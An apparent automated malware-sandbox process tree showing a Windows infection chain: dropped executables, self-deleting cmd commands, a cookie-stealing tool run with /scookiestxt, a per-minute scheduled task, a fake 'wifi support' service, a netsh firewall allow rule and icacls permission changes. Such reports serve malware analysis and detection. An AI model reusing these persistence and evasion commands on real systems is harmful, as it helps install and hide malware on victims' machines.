-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5824 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2020 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6228 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:84⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6384 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6376 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6652 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5504 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3424 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3400 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1708 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5552 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4012 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7468 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6520 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7332 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4964 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7188 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6944 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6956 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6392 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1336 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7532 /prefetch:24⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1396 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6540 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3336 /prefetch:84⤵
-
-
-
-
C:\Users\Admin\Documents\5asy6n6oyspaENRUkZtA5Qzq.exe"C:\Users\Admin\Documents\5asy6n6oyspaENRUkZtA5Qzq.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5asy6n6oyspaENRUkZtA5Qzq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5asy6n6oyspaENRUkZtA5Qzq.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5asy6n6oyspaENRUkZtA5Qzq.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Documents\1e7R95rlQRS8XSN3FdabTAwe.exe"C:\Users\Admin\Documents\1e7R95rlQRS8XSN3FdabTAwe.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exe"C:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exeC:\Users\Admin\Documents\kkfaipZZsCSio_SIEPN_fS7Q.exe3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\6aHyyuXvRg2Nf7uXsT2DRK2_.exe"C:\Users\Admin\Documents\6aHyyuXvRg2Nf7uXsT2DRK2_.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"C:\Users\Admin\Documents\xSLm9TxrFgsjNWJfMr70y5PL.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"C:\Users\Admin\Documents\lmADWHMCKuJKoLPUfWwB_mkn.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
-
-
C:\Users\Admin\Documents\SqCdxdUoq1RCWE_A0cLiPOjc.exe"C:\Users\Admin\Documents\SqCdxdUoq1RCWE_A0cLiPOjc.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\83455048486.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\1624584007826.exe"C:\Users\Admin\AppData\Local\Temp\1624584007826.exe"6⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe" /mix3⤵
-
C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe"C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe" /mix4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\lpjVCJfEaf & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{jkeK-gGH0r-EcLV-Zmn8y}\36196613693.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "SqCdxdUoq1RCWE_A0cLiPOjc.exe" /f & erase "C:\Users\Admin\Documents\SqCdxdUoq1RCWE_A0cLiPOjc.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "SqCdxdUoq1RCWE_A0cLiPOjc.exe" /f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\ae9v_KHZDBou_RKNbj1dJPjn.exe"C:\Users\Admin\Documents\ae9v_KHZDBou_RKNbj1dJPjn.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\XM2GDOsP0pGcjrblTowiJBOv.exe"C:\Users\Admin\Documents\XM2GDOsP0pGcjrblTowiJBOv.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl4⤵
- Loads dropped DLL
- Modifies registry class
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
C:\Program Files (x86)\Company\NewProduct\file4.exe"C:\Program Files (x86)\Company\NewProduct\file4.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_7.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_2.exearnatic_2.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_3.exearnatic_3.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Executes dropped EXE
- Adds Run key to start application
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1E8B.exeC:\Users\Admin\AppData\Local\Temp\1E8B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\2AD0.exeC:\Users\Admin\AppData\Local\Temp\2AD0.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\383F.exeC:\Users\Admin\AppData\Local\Temp\383F.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\383F.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\4417.exeC:\Users\Admin\AppData\Local\Temp\4417.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Videocard Service" /tr "C:\Users\Admin\AppData\Local\Temp\5A11.exe" /f2⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\62FB.exeC:\Users\Admin\AppData\Local\Temp\62FB.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6F60.exeC:\Users\Admin\AppData\Local\Temp\6F60.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7BF4.exeC:\Users\Admin\AppData\Local\Temp\7BF4.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\334E.exeC:\Users\Admin\AppData\Local\Temp\334E.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\334E.exeC:\Users\Admin\AppData\Local\Temp\334E.exe2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\334E.exe"C:\Users\Admin\AppData\Local\Temp\334E.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\334E.exe"C:\Users\Admin\AppData\Local\Temp\334E.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3999.exeC:\Users\Admin\AppData\Local\Temp\3999.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\lfeexejk\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\irgbnmtd.exe" C:\Windows\SysWOW64\lfeexejk\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create lfeexejk binPath= "C:\Windows\SysWOW64\lfeexejk\irgbnmtd.exe /d\"C:\Users\Admin\AppData\Local\Temp\3999.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description lfeexejk "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lfeexejk2⤵
-
-
C:\Users\Admin\wxdmxthp.exe"C:\Users\Admin\wxdmxthp.exe" /d"C:\Users\Admin\AppData\Local\Temp\3999.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jtojaatz.exe" C:\Windows\SysWOW64\lfeexejk\3⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config lfeexejk binPath= "C:\Windows\SysWOW64\lfeexejk\jtojaatz.exe /d\"C:\Users\Admin\wxdmxthp.exe\""3⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lfeexejk3⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0512.bat" "3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\69D2.exeC:\Users\Admin\AppData\Local\Temp\69D2.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\69D2.exe"C:\Users\Admin\AppData\Local\Temp\69D2.exe"2⤵
-
-
